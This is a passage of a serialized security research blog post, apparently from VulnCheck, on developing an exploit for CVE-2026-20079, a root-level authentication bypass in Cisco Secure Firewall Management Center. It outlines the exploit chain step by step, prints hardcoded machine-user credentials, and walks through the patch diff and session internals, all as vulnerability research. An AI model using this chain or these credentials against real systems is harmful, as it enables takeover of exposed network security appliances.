Black","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U072UD3MW56-12d631dac54f-512","https:\u002F\u002Fhosakacorp.net","hosakacorp.net",{"type":145,"value":1249,"toc":7244},[1250,1255,1269,1273,1285,1288,1345,1350,1353,1370,1378,1382,1390,1399,1406,1417,1420,1423,1430,1448,1457,1463,1813,1819,1825,1875,1890,1894,1901,2206,2213,2220,2230,2482,2492,2515,2518,3086,3089,3111,3129,3136,3200,3389,3399,3458,3648,3654,3657,3663,3667,3670,3676,3679,3720,3746,3749,3756,3765,3790,3800,3967,3989,4088,4109,4115,4119,4139,4588,4598,4611,4627,4731,4746,5078,5089,5467,5481,5485,5488,5556,5567,5633,5695,5787,5790,5810,5961,5964,6104,6113,6140,6143,6226,6355,6359,6378,6830,6843,6974,6977,7154,7166,7172,7182,7191,7193,7212,7240],[1251,1252],"check-list",{":list":1253,"ico":1254,"title":347},"[\"CVE-2026-20079 is a CVSS 10.0 RCE vulnerability in Cisco Secure Firewall Management Center\",\"VulnCheck's Initial Access Intelligence team developed an exploit that proved the vulnerability is exploitable but has significant prerequisites\",\"In this blog, our team walks through practical exploit development steps and the hurdles we encountered along the way\"]","mdi:check-bold",[184,1256,1257,1258,1263,1264,1268],{},"On March 4, 2026, Cisco published an advisory for CVE-2026-20079, a CVSS 10.0 vulnerability in Cisco Secure Firewall Management Center (FMC). Since Cisco networking gear tends to be a common adversary target, our Initial Access Intelligence team’s interest was immediately piqued. 
Censys ",[274,1259,1262],{"href":1260,"rel":1261},"https:\u002F\u002Fplatform.censys.io\u002Fsearch?q=host.services.endpoints.http.headers%3A%28key%3D%22Server%22+and+value%3A%22Mojolicious+%28Perl%29%22%29+and+host.services.endpoints.http.body%3A%22Management+Center%22+and+host.services.endpoints.http.body%3A%22%2Fimg%2Fcisco-icon.svg%22",[278],"finds"," about 300 Cisco FMC instances on the public internet, while FOFA ",[274,1265,1262],{"href":1266,"rel":1267},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=c2VydmVyPSJNb2pvbGljaW91cyAoUGVybCkiICYmIGJvZHk9Ik1hbmFnZW1lbnQgQ2VudGVyIiAmJiBib2R5PSIvaW1nL2Npc2NvLWljb24uc3ZnP3Yi",[278]," between 600 and 700 exposed systems. This blog goes into detail on the exploit development process for CVE-2026-20079, which was an unexpectedly wild ride.",[246,1270,1272],{"id":1271},"spoiler-the-end-result","Spoiler: The End Result",[184,1274,1275,1276,1280,1281,1284],{},"CVE-2026-20079 arises when a startup process on the FMC system creates a partial ",[1277,1278,1279],"code",{},"csm_processes"," session in the ",[1277,1282,1283],{},"sfsnort.sessions"," database. 
If no users authenticate after the system boots, the session persists and can be upgraded into permissions usable by an attacker, who could then call a significant set of CGI scripts.",[184,1286,1287],{},"VulnCheck identified that certain scripts could be chained such that a low-privileged session ID could be upgraded into a UI login session, after which RCE is possible via a multi-step process:",[227,1289,1290,1296,1311,1317,1324,1338],{},[230,1291,1292,1293,1295],{},"The ",[1277,1294,1279],{}," session is created in the database at boot and is marked as a machine process with a static session ID, instead of a dynamic UUID like the rest of the system",[230,1297,1292,1298,1300,1301,1303,1304,1307,1308,1201],{},[1277,1299,1279],{}," session ID could be upgraded into a UI session via hardcoded credentials with the report user, which then uses the ",[1277,1302,1279],{}," session UI permissions to allow authentication. This creates a set of required session parameters that are needed for accessing the API calls, namely ",[1277,1305,1306],{},"sf_action_id",". The hardcoded machine user credentials are ",[1277,1309,1310],{},"report:snortrules",[230,1312,1313,1314,1316],{},"The report user session is then granted the rights to view the UI pages containing the ",[1277,1315,1306],{}," (no actual user privileges are assigned), which is extracted.",[230,1318,1319,1320,1323],{},"An arbitrary file write is conducted on sajaxintf.cgi via the all user-privileged validateLicense bulk AJAX API endpoint, which writes Unicode-escaped data to ",[1277,1321,1322],{},"\u002Fvar\u002Ftmp\u002Flicense.tmp",". 
For the purposes of our exploit, we wrote a special shell script with the \"Makeself\" Cisco-defined format that utilizes several hardcoded strings.",[230,1325,1326,1327,1330,1331,1334,1335,1337],{},"The shell script that we wrote to license.tmp is then executed by calling the \"all\"-privileged allowed ",[1277,1328,1329],{},"pjb.cgi"," endpoint with the ",[1277,1332,1333],{},"SF::UI::DataObjectLibrary::upgradeReadinessCall"," and calling the ",[1277,1336,1322],{}," shell script as the target.",[230,1339,1340,1341,1344],{},"The FMC system then processes the license.tmp file as an upgrade script and triggers an \"install\" process that ends up executing a ",[1277,1342,1343],{},"SF::System::Wrappers::RunCmd"," Perl function that runs the script as root.",[1346,1347,1349],"h3",{"id":1348},"exploitation-prerequisites","Exploitation Prerequisites",[184,1351,1352],{},"In order for the authentication bypass to succeed, the FMC host must have been rebooted, and the session must still exist in the database. Our team identified several instances where the required session will not be present, which would prevent exploitation until the system reboots. 
Any of the following may clear the injected session:",[227,1354,1355,1361,1364],{},[230,1356,1357,1358,1360],{},"Dashboard and widget interaction from authenticated users clears the \"old sessions,\" including the old ",[1277,1359,1279],{}," session",[230,1362,1363],{},"Cloud-managed sessions interacting with the web UI",[230,1365,1366,1367,1369],{},"Periodic cleanups are triggered on account authentication, which happens sporadically for the automated ",[1277,1368,1279],{}," user.",[184,1371,1372,1373,1377],{},"This means that it's likely the only time the target will be exploitable is shortly after boot, ",[1374,1375,1376],"em",{},"or"," on systems that aren’t commonly interacted with or directly authenticated to the web UI.",[246,1379,1381],{"id":1380},"root-cause-analysis","Root Cause Analysis",[184,1383,1292,1384,1389],{},[274,1385,1388],{"href":1386,"rel":1387},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-onprem-fmc-authbypass-5JPp45V2",[278],"Cisco advisory"," for CVE-2026-20079 states that:",[1391,1392,1393,1396],"blockquote",{},[184,1394,1395],{},"A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.",[184,1397,1398],{},"This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. 
A successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device.",[184,1400,1401,1402,1405],{},"To our hacker ears this says very little, and by not saying a lot, the things it ",[1374,1403,1404],{},"does"," say matter a ton:",[227,1407,1408,1411],{},[230,1409,1410],{},"The boot time statement tells me that something is up with session handling at system boot time",[230,1412,1413,1414,1416],{},"The vulnerability’s being unauthenticated immediately tells me that the boot time process enabled some session manipulation to reach management scripts, ",[1374,1415,1376],{}," that some hard-coded process allows a set of known values to be manipulated into a real session.",[184,1418,1419],{},"The only way to know was to dig in.",[184,1421,1422],{},"After patch diffing, a few things became apparent: The FMC system was a complex set of APIs that used Apache HTTPD redirects and proxy rewrites to access a large set of Perl, Java, and Go services running on the host, and the changes related to CVE-2026-20079 were relatively small.",[184,1424,1425,1426,1429],{},"The primary changes were to the Apache HTTPD configuration file and to the ",[1277,1427,1428],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm"," Perl Mojolicious CGI authentication handler, with a grand total of around 25 lines of code changed. Great, this should be easy, right? (This is a literary device called foreshadowing.)",[184,1431,1432,1433,1436,1437,1440,1441,1444,1445,1447],{},"The first change was to the ",[1277,1434,1435],{},"httpsd_conf.tt"," template located at ",[1277,1438,1439],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Fhtdocs\u002Ftemplates\u002Fhtml_templates\u002Fstig\u002Fhttpsd_conf.tt",". This is used as a template to generate the configuration for the Apache web service that functions as the main entry point for routing on FMC. 
The changes below show that the only addition was to add a check for whether the remote address is from the local system, and if it is, to set a ",[1277,1442,1443],{},"X-Auth-User-Type"," header to ",[1277,1446,454],{},":",[1449,1450,1455],"pre",{"className":1451,"code":1453,"language":1454},[1452],"language-text","SetEnvIf Remote_Addr ^127\\.0\\.0\\.1$|^::1$ request_is_local\nRequestHeader set X-Auth-User-Type 1 env=!request_is_local\n","text",[1277,1456,1453],{"__ignoreMap":148},[184,1458,1459,1460,1462],{},"A corresponding addition was made to the Perl authentication handling library at ",[1277,1461,1428],{},", which adds the following validation for the previously added header; if a session exists for an account and the header type does not match the expected user type, it will trigger an unauthorized error:",[1449,1464,1468],{"className":1465,"code":1466,"language":1467,"meta":148,"style":148},"language-perl shiki shiki-themes material-theme-lighter github-light github-dark monokai","# verify user type\nif ($session) {\n    my $userTypeFromSession = $session->param('usertype');\n    my $userTypeFromHeader;\n    if (ref($q) eq 'Mojo::Message::Request') {\n        $userTypeFromHeader = $q->headers->header('X-Auth-User-Type');\n    } else {\n        $userTypeFromHeader = $q->http('X-Auth-User-Type');\n    }\n    if (\n        defined $userTypeFromHeader &&\n        $userTypeFromHeader == AUTH_IS_USER &&\n        defined $userTypeFromSession &&\n        $userTypeFromSession != AUTH_IS_USER\n    ) {\n        my $username = $session->param('username');\n        warn \"CheckLogin: Incorrect user type: $userTypeFromHeader != $userTypeFromSession ($username)\";\n        return 0 if $hasReturnFlag;\n        Unauthorized($q, $session);\n    
}\n}\n","perl",[1277,1469,1470,1479,1496,1534,1544,1578,1610,1622,1646,1652,1660,1671,1679,1689,1697,1703,1731,1771,1787,1803,1808],{"__ignoreMap":148},[1471,1472,1475],"span",{"class":1473,"line":1474},"line",1,[1471,1476,1478],{"class":1477},"ss7Ak","# verify user type\n",[1471,1480,1481,1485,1489,1493],{"class":1473,"line":149},[1471,1482,1484],{"class":1483},"sRxSC","if",[1471,1486,1488],{"class":1487},"ss--_"," (",[1471,1490,1492],{"class":1491},"swvn1","$",[1471,1494,1495],{"class":1487},"session) {\n",[1471,1497,1499,1503,1506,1509,1511,1514,1518,1521,1525,1529,1531],{"class":1473,"line":1498},3,[1471,1500,1502],{"class":1501},"sTNss","    my",[1471,1504,1505],{"class":1491}," $",[1471,1507,1508],{"class":1487},"userTypeFromSession = ",[1471,1510,1492],{"class":1491},[1471,1512,1513],{"class":1487},"session",[1471,1515,1517],{"class":1516},"sGXK2","->",[1471,1519,1520],{"class":1487},"param(",[1471,1522,1524],{"class":1523},"siCPE","'",[1471,1526,1528],{"class":1527},"sLACW","usertype",[1471,1530,1524],{"class":1523},[1471,1532,1533],{"class":1487},");\n",[1471,1535,1537,1539,1541],{"class":1473,"line":1536},4,[1471,1538,1502],{"class":1501},[1471,1540,1505],{"class":1491},[1471,1542,1543],{"class":1487},"userTypeFromHeader;\n",[1471,1545,1547,1550,1552,1556,1559,1561,1564,1567,1570,1573,1575],{"class":1473,"line":1546},5,[1471,1548,1549],{"class":1483},"    if",[1471,1551,1488],{"class":1487},[1471,1553,1555],{"class":1554},"sMLJd","ref",[1471,1557,1558],{"class":1487},"(",[1471,1560,1492],{"class":1491},[1471,1562,1563],{"class":1487},"q) ",[1471,1565,1566],{"class":1554},"eq",[1471,1568,1569],{"class":1523}," '",[1471,1571,1572],{"class":1527},"Mojo::Message::Request",[1471,1574,1524],{"class":1523},[1471,1576,1577],{"class":1487},") {\n",[1471,1579,1581,1584,1587,1589,1592,1594,1597,1599,1602,1604,1606,1608],{"class":1473,"line":1580},6,[1471,1582,1583],{"class":1491},"        $",[1471,1585,1586],{"class":1487},"userTypeFromHeader = 
",[1471,1588,1492],{"class":1491},[1471,1590,1591],{"class":1487},"q",[1471,1593,1517],{"class":1516},[1471,1595,1596],{"class":1487},"headers",[1471,1598,1517],{"class":1516},[1471,1600,1601],{"class":1487},"header(",[1471,1603,1524],{"class":1523},[1471,1605,1443],{"class":1527},[1471,1607,1524],{"class":1523},[1471,1609,1533],{"class":1487},[1471,1611,1613,1616,1619],{"class":1473,"line":1612},7,[1471,1614,1615],{"class":1487},"    } ",[1471,1617,1618],{"class":1483},"else",[1471,1620,1621],{"class":1487}," {\n",[1471,1623,1625,1627,1629,1631,1633,1635,1638,1640,1642,1644],{"class":1473,"line":1624},8,[1471,1626,1583],{"class":1491},[1471,1628,1586],{"class":1487},[1471,1630,1492],{"class":1491},[1471,1632,1591],{"class":1487},[1471,1634,1517],{"class":1516},[1471,1636,1637],{"class":1487},"http(",[1471,1639,1524],{"class":1523},[1471,1641,1443],{"class":1527},[1471,1643,1524],{"class":1523},[1471,1645,1533],{"class":1487},[1471,1647,1649],{"class":1473,"line":1648},9,[1471,1650,1651],{"class":1487},"    }\n",[1471,1653,1655,1657],{"class":1473,"line":1654},10,[1471,1656,1549],{"class":1483},[1471,1658,1659],{"class":1487}," (\n",[1471,1661,1663,1666,1668],{"class":1473,"line":1662},11,[1471,1664,1665],{"class":1554},"        defined",[1471,1667,1505],{"class":1491},[1471,1669,1670],{"class":1487},"userTypeFromHeader &&\n",[1471,1672,1674,1676],{"class":1473,"line":1673},12,[1471,1675,1583],{"class":1491},[1471,1677,1678],{"class":1487},"userTypeFromHeader == AUTH_IS_USER &&\n",[1471,1680,1682,1684,1686],{"class":1473,"line":1681},13,[1471,1683,1665],{"class":1554},[1471,1685,1505],{"class":1491},[1471,1687,1688],{"class":1487},"userTypeFromSession &&\n",[1471,1690,1692,1694],{"class":1473,"line":1691},14,[1471,1693,1583],{"class":1491},[1471,1695,1696],{"class":1487},"userTypeFromSession != AUTH_IS_USER\n",[1471,1698,1700],{"class":1473,"line":1699},15,[1471,1701,1702],{"class":1487},"    ) 
{\n",[1471,1704,1706,1709,1711,1714,1716,1718,1720,1722,1724,1727,1729],{"class":1473,"line":1705},16,[1471,1707,1708],{"class":1501},"        my",[1471,1710,1505],{"class":1491},[1471,1712,1713],{"class":1487},"username = ",[1471,1715,1492],{"class":1491},[1471,1717,1513],{"class":1487},[1471,1719,1517],{"class":1516},[1471,1721,1520],{"class":1487},[1471,1723,1524],{"class":1523},[1471,1725,1726],{"class":1527},"username",[1471,1728,1524],{"class":1523},[1471,1730,1533],{"class":1487},[1471,1732,1734,1737,1740,1743,1745,1748,1751,1753,1756,1758,1760,1762,1765,1768],{"class":1473,"line":1733},17,[1471,1735,1736],{"class":1554},"        warn",[1471,1738,1739],{"class":1523}," \"",[1471,1741,1742],{"class":1527},"CheckLogin: Incorrect user type: ",[1471,1744,1492],{"class":1491},[1471,1746,1747],{"class":1487},"userTypeFromHeader",[1471,1749,1750],{"class":1527}," != ",[1471,1752,1492],{"class":1491},[1471,1754,1755],{"class":1487},"userTypeFromSession",[1471,1757,1488],{"class":1527},[1471,1759,1492],{"class":1491},[1471,1761,1726],{"class":1487},[1471,1763,1764],{"class":1527},")",[1471,1766,1767],{"class":1523},"\"",[1471,1769,1770],{"class":1487},";\n",[1471,1772,1774,1777,1780,1782,1784],{"class":1473,"line":1773},18,[1471,1775,1776],{"class":1483},"        return",[1471,1778,1779],{"class":1487}," 0 ",[1471,1781,1484],{"class":1483},[1471,1783,1505],{"class":1491},[1471,1785,1786],{"class":1487},"hasReturnFlag;\n",[1471,1788,1790,1793,1795,1798,1800],{"class":1473,"line":1789},19,[1471,1791,1792],{"class":1487},"        Unauthorized(",[1471,1794,1492],{"class":1491},[1471,1796,1797],{"class":1487},"q, ",[1471,1799,1492],{"class":1491},[1471,1801,1802],{"class":1487},"session);\n",[1471,1804,1806],{"class":1473,"line":1805},20,[1471,1807,1651],{"class":1487},[1471,1809,1810],{"class":1473,"line":50},[1471,1811,1812],{"class":1487},"}\n",[184,1814,1815,1816,1369],{},"These two changes let us know that the authentication bug relates to the \"user type\" and that 
any interaction with the web UI will force the user type to be a specific value. This, in turn, means that the authentication bug likely has to do with a non-",[1277,1817,1818],{},"AUTH_IS_USER",[184,1820,1292,1821,1824],{},[1277,1822,1823],{},"Auth.pm"," file defines a set of user types:",[1449,1826,1828],{"className":1465,"code":1827,"language":1467,"meta":148,"style":148},"use constant AUTH_IS_NONE => 0;\nuse constant AUTH_IS_USER => 1;\nuse constant AUTH_IS_MACHINE => 2;\n",[1277,1829,1830,1848,1861],{"__ignoreMap":148},[1471,1831,1832,1835,1838,1842,1845],{"class":1473,"line":1474},[1471,1833,1834],{"class":1483},"use",[1471,1836,1837],{"class":1487}," constant ",[1471,1839,1841],{"class":1840},"sHBcC","AUTH_IS_NONE",[1471,1843,1844],{"class":1516}," =>",[1471,1846,1847],{"class":1487}," 0;\n",[1471,1849,1850,1852,1854,1856,1858],{"class":1473,"line":149},[1471,1851,1834],{"class":1483},[1471,1853,1837],{"class":1487},[1471,1855,1818],{"class":1840},[1471,1857,1844],{"class":1516},[1471,1859,1860],{"class":1487}," 1;\n",[1471,1862,1863,1865,1867,1870,1872],{"class":1473,"line":1498},[1471,1864,1834],{"class":1483},[1471,1866,1837],{"class":1487},[1471,1868,1869],{"class":1840},"AUTH_IS_MACHINE",[1471,1871,1844],{"class":1516},[1471,1873,1874],{"class":1487}," 2;\n",[184,1876,1877,1878,1880,1881,1883,1884,1886,1887,1889],{},"So we also know that the vulnerability is likely related to the ",[1277,1879,1869],{}," user type, as the Apache changes force the web server interaction into a ",[1277,1882,454],{}," or ",[1277,1885,1818],{}," state. 
Time to start hunting for the potential users and authentication mechanisms for the ",[1277,1888,1869],{}," type.",[246,1891,1893],{"id":1892},"what-is-a-user-after-all","What is a User After All?",[184,1895,1896,1897,1900],{},"After searching the Perl code base and checking the database, we identified that the following are hardcoded user credentials that are extracted from the ",[1277,1898,1899],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Frepair_users.pl"," script:",[1449,1902,1904],{"className":1465,"code":1903,"language":1467,"meta":148,"style":148},"# Now create other system users\ncreate_user(\"report\", \"ReportUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"report\", \"snortrules\");\ncreate_user(\"sftop10user\", \"Top10User\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"sftop10user\", \"snortrules\");\ncreate_user(\"SRU\", \"SRUuser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"SRU\", \"snortrules\");\ncreate_user(\"Sourcefire\", \"SourcefireUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"Sourcefire\", \"snortrules\");\ncreate_user(\"csm_processes\", \"csm_processes\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"csm_processes\", \"csmdaemon\");\n",[1277,1905,1906,1911,1953,1975,2013,2033,2071,2091,2129,2149,2185],{"__ignoreMap":148},[1471,1907,1908],{"class":1473,"line":1474},[1471,1909,1910],{"class":1477},"# Now create other system users\n",[1471,1912,1913,1916,1918,1921,1923,1926,1928,1931,1933,1935,1937,1940,1942,1944,1946,1948,1950],{"class":1473,"line":149},[1471,1914,1915],{"class":1487},"create_user(",[1471,1917,1767],{"class":1523},[1471,1919,1920],{"class":1527},"report",[1471,1922,1767],{"class":1523},[1471,1924,1925],{"class":1487},", 
",[1471,1927,1767],{"class":1523},[1471,1929,1930],{"class":1527},"ReportUser",[1471,1932,1767],{"class":1523},[1471,1934,1925],{"class":1487},[1471,1936,1767],{"class":1523},[1471,1938,1939],{"class":1527},"none",[1471,1941,1767],{"class":1523},[1471,1943,1925],{"class":1487},[1471,1945,1767],{"class":1523},[1471,1947,1939],{"class":1527},[1471,1949,1767],{"class":1523},[1471,1951,1952],{"class":1487},", SF::Auth::AUTH_IS_MACHINE, 0);\n",[1471,1954,1955,1958,1960,1962,1964,1966,1968,1971,1973],{"class":1473,"line":1498},[1471,1956,1957],{"class":1487},"change_password(",[1471,1959,1767],{"class":1523},[1471,1961,1920],{"class":1527},[1471,1963,1767],{"class":1523},[1471,1965,1925],{"class":1487},[1471,1967,1767],{"class":1523},[1471,1969,1970],{"class":1527},"snortrules",[1471,1972,1767],{"class":1523},[1471,1974,1533],{"class":1487},[1471,1976,1977,1979,1981,1984,1986,1988,1990,1993,1995,1997,1999,2001,2003,2005,2007,2009,2011],{"class":1473,"line":1536},[1471,1978,1915],{"class":1487},[1471,1980,1767],{"class":1523},[1471,1982,1983],{"class":1527},"sftop10user",[1471,1985,1767],{"class":1523},[1471,1987,1925],{"class":1487},[1471,1989,1767],{"class":1523},[1471,1991,1992],{"class":1527},"Top10User",[1471,1994,1767],{"class":1523},[1471,1996,1925],{"class":1487},[1471,1998,1767],{"class":1523},[1471,2000,1939],{"class":1527},[1471,2002,1767],{"class":1523},[1471,2004,1925],{"class":1487},[1471,2006,1767],{"class":1523},[1471,2008,1939],{"class":1527},[1471,2010,1767],{"class":1523},[1471,2012,1952],{"class":1487},[1471,2014,2015,2017,2019,2021,2023,2025,2027,2029,2031],{"class":1473,"line":1546},[1471,2016,1957],{"class":1487},[1471,2018,1767],{"class":1523},[1471,2020,1983],{"class":1527},[1471,2022,1767],{"class":1523},[1471,2024,1925],{"class":1487},[1471,2026,1767],{"class":1523},[1471,2028,1970],{"class":1527},[1471,2030,1767],{"class":1523},[1471,2032,1533],{"class":1487},[1471,2034,2035,2037,2039,2042,2044,2046,2048,2051,2053,2055,2057,2059,2061,2063,2065,2
067,2069],{"class":1473,"line":1580},[1471,2036,1915],{"class":1487},[1471,2038,1767],{"class":1523},[1471,2040,2041],{"class":1527},"SRU",[1471,2043,1767],{"class":1523},[1471,2045,1925],{"class":1487},[1471,2047,1767],{"class":1523},[1471,2049,2050],{"class":1527},"SRUuser",[1471,2052,1767],{"class":1523},[1471,2054,1925],{"class":1487},[1471,2056,1767],{"class":1523},[1471,2058,1939],{"class":1527},[1471,2060,1767],{"class":1523},[1471,2062,1925],{"class":1487},[1471,2064,1767],{"class":1523},[1471,2066,1939],{"class":1527},[1471,2068,1767],{"class":1523},[1471,2070,1952],{"class":1487},[1471,2072,2073,2075,2077,2079,2081,2083,2085,2087,2089],{"class":1473,"line":1612},[1471,2074,1957],{"class":1487},[1471,2076,1767],{"class":1523},[1471,2078,2041],{"class":1527},[1471,2080,1767],{"class":1523},[1471,2082,1925],{"class":1487},[1471,2084,1767],{"class":1523},[1471,2086,1970],{"class":1527},[1471,2088,1767],{"class":1523},[1471,2090,1533],{"class":1487},[1471,2092,2093,2095,2097,2100,2102,2104,2106,2109,2111,2113,2115,2117,2119,2121,2123,2125,2127],{"class":1473,"line":1624},[1471,2094,1915],{"class":1487},[1471,2096,1767],{"class":1523},[1471,2098,2099],{"class":1527},"Sourcefire",[1471,2101,1767],{"class":1523},[1471,2103,1925],{"class":1487},[1471,2105,1767],{"class":1523},[1471,2107,2108],{"class":1527},"SourcefireUser",[1471,2110,1767],{"class":1523},[1471,2112,1925],{"class":1487},[1471,2114,1767],{"class":1523},[1471,2116,1939],{"class":1527},[1471,2118,1767],{"class":1523},[1471,2120,1925],{"class":1487},[1471,2122,1767],{"class":1523},[1471,2124,1939],{"class":1527},[1471,2126,1767],{"class":1523},[1471,2128,1952],{"class":1487},[1471,2130,2131,2133,2135,2137,2139,2141,2143,2145,2147],{"class":1473,"line":1648},[1471,2132,1957],{"class":1487},[1471,2134,1767],{"class":1523},[1471,2136,2099],{"class":1527},[1471,2138,1767],{"class":1523},[1471,2140,1925],{"class":1487},[1471,2142,1767],{"class":1523},[1471,2144,1970],{"class":1527},[1471,2146,1767],{"class"
:1523},[1471,2148,1533],{"class":1487},[1471,2150,2151,2153,2155,2157,2159,2161,2163,2165,2167,2169,2171,2173,2175,2177,2179,2181,2183],{"class":1473,"line":1654},[1471,2152,1915],{"class":1487},[1471,2154,1767],{"class":1523},[1471,2156,1279],{"class":1527},[1471,2158,1767],{"class":1523},[1471,2160,1925],{"class":1487},[1471,2162,1767],{"class":1523},[1471,2164,1279],{"class":1527},[1471,2166,1767],{"class":1523},[1471,2168,1925],{"class":1487},[1471,2170,1767],{"class":1523},[1471,2172,1939],{"class":1527},[1471,2174,1767],{"class":1523},[1471,2176,1925],{"class":1487},[1471,2178,1767],{"class":1523},[1471,2180,1939],{"class":1527},[1471,2182,1767],{"class":1523},[1471,2184,1952],{"class":1487},[1471,2186,2187,2189,2191,2193,2195,2197,2199,2202,2204],{"class":1473,"line":1662},[1471,2188,1957],{"class":1487},[1471,2190,1767],{"class":1523},[1471,2192,1279],{"class":1527},[1471,2194,1767],{"class":1523},[1471,2196,1925],{"class":1487},[1471,2198,1767],{"class":1523},[1471,2200,2201],{"class":1527},"csmdaemon",[1471,2203,1767],{"class":1523},[1471,2205,1533],{"class":1487},[184,2207,2208,2209,2212],{},"These hardcoded credentials corresponded to the hashes stored in the FMC system’s MySQL server in the ",[1277,2210,2211],{},"sfsnort.users"," database table, meaning that they are at least partially hardcoded. Immediately, our first instinct was to try authenticating with every authentication entry point we could find with these credentials, but no dice: Machine users are unable to authenticate to the web interface and are not allowed to interact with the routed API services. By inspecting the Apache logs and packet captures, we could see that these processes were run locally, and each of these users would occasionally interact with portions of the API from the local machine perspective.",[184,2214,2215,2216,1201],{},"This gave us a few hints about where these machine user accounts were created and some of their common uses. 
The next step was to figure out what \"This vulnerability is due to an improper system process that is created at boot time\" meant in Cisco’s ",[274,2217,2219],{"href":1386,"rel":2218},[278],"advisory",[184,2221,2222,2223,2226,2227,2229],{},"During boot time, a few of the above accounts run scripts of the startup process for FMC. Only the Go binary ",[1277,2224,2225],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Fauth-daemon"," handles a large number of initial startup actions. One of the primary actions is to create a session for the ",[1277,2228,1279],{}," user to kick-off its first-start logic, which ends in the following database entry containing the Perl serialized session information:",[1449,2231,2235],{"className":2232,"code":2233,"language":2234,"meta":148,"style":148},"language-sql shiki shiki-themes material-theme-lighter github-light github-dark monokai","MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session\n| $D = {'username' => 'csm_processes','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','session_expire_check' => 1,'useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','usertype' => 2,'_SESSION_CTIME' => 1773962523,'_SESSION_ATIME' => 1773962523,'_SESSION_ID' => 'csm_processes','active' => 0,'_SESSION_REMOTE_ADDR' => '','_SESSION_EXPIRE_LIST' => {},'VMS_SESSION_ID' => 'csm_processes','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f'};;$D |\n","sql",[1277,2236,2237,2266,2271],{"__ignoreMap":148},[1471,2238,2239,2242,2245,2249,2252,2255,2259,2261,2264],{"class":1473,"line":1474},[1471,2240,2241],{"class":1487},"MariaDB [(none)]",[1471,2243,2244],{"class":1516},">",[1471,2246,2248],{"class":2247},"shWJe"," SELECT",[1471,2250,2251],{"class":1487}," a_session ",[1471,2253,2254],{"class":2247},"FROM",[1471,2256,2258],{"class":2257},"sQeA1"," 
sfsnort",[1471,2260,1201],{"class":1487},[1471,2262,2263],{"class":2257},"sessions",[1471,2265,1770],{"class":1487},[1471,2267,2268],{"class":1473,"line":149},[1471,2269,2270],{"class":1487},"| a_session\n",[1471,2272,2273,2276,2279,2282,2284,2286,2288,2290,2292,2294,2296,2299,2301,2304,2306,2308,2310,2313,2315,2317,2319,2322,2324,2326,2330,2332,2334,2337,2339,2341,2343,2346,2348,2350,2352,2354,2356,2358,2361,2363,2365,2368,2370,2372,2375,2377,2379,2382,2384,2386,2388,2390,2392,2395,2397,2399,2401,2403,2405,2407,2409,2412,2414,2416,2419,2421,2423,2426,2428,2430,2433,2435,2437,2440,2442,2444,2447,2449,2452,2454,2456,2458,2460,2462,2464,2466,2469,2471,2473,2475,2477,2479],{"class":1473,"line":1498},[1471,2274,2275],{"class":1487},"| $D ",[1471,2277,2278],{"class":1516},"=",[1471,2280,2281],{"class":1487}," {",[1471,2283,1524],{"class":1523},[1471,2285,1726],{"class":1527},[1471,2287,1524],{"class":1523},[1471,2289,1844],{"class":1516},[1471,2291,1569],{"class":1523},[1471,2293,1279],{"class":1527},[1471,2295,1524],{"class":1523},[1471,2297,2298],{"class":1487},",",[1471,2300,1524],{"class":1523},[1471,2302,2303],{"class":1527},"original_domain",[1471,2305,1524],{"class":1523},[1471,2307,1844],{"class":1516},[1471,2309,1569],{"class":1523},[1471,2311,2312],{"class":1527},"e276abec-e0f2-11e3-8169-6d9ed49b625f",[1471,2314,1524],{"class":1523},[1471,2316,2298],{"class":1487},[1471,2318,1524],{"class":1523},[1471,2320,2321],{"class":1527},"session_expire_check",[1471,2323,1524],{"class":1523},[1471,2325,1844],{"class":1516},[1471,2327,2329],{"class":2328},"sYThS"," 
1",[1471,2331,2298],{"class":1487},[1471,2333,1524],{"class":1523},[1471,2335,2336],{"class":1527},"useruuid",[1471,2338,1524],{"class":1523},[1471,2340,1844],{"class":1516},[1471,2342,1569],{"class":1523},[1471,2344,2345],{"class":1527},"8acb8f4a-c40d-11e3-95aa-54f999c07ac9",[1471,2347,1524],{"class":1523},[1471,2349,2298],{"class":1487},[1471,2351,1524],{"class":1523},[1471,2353,1528],{"class":1527},[1471,2355,1524],{"class":1523},[1471,2357,1844],{"class":1516},[1471,2359,2360],{"class":2328}," 2",[1471,2362,2298],{"class":1487},[1471,2364,1524],{"class":1523},[1471,2366,2367],{"class":1527},"_SESSION_CTIME",[1471,2369,1524],{"class":1523},[1471,2371,1844],{"class":1516},[1471,2373,2374],{"class":2328}," 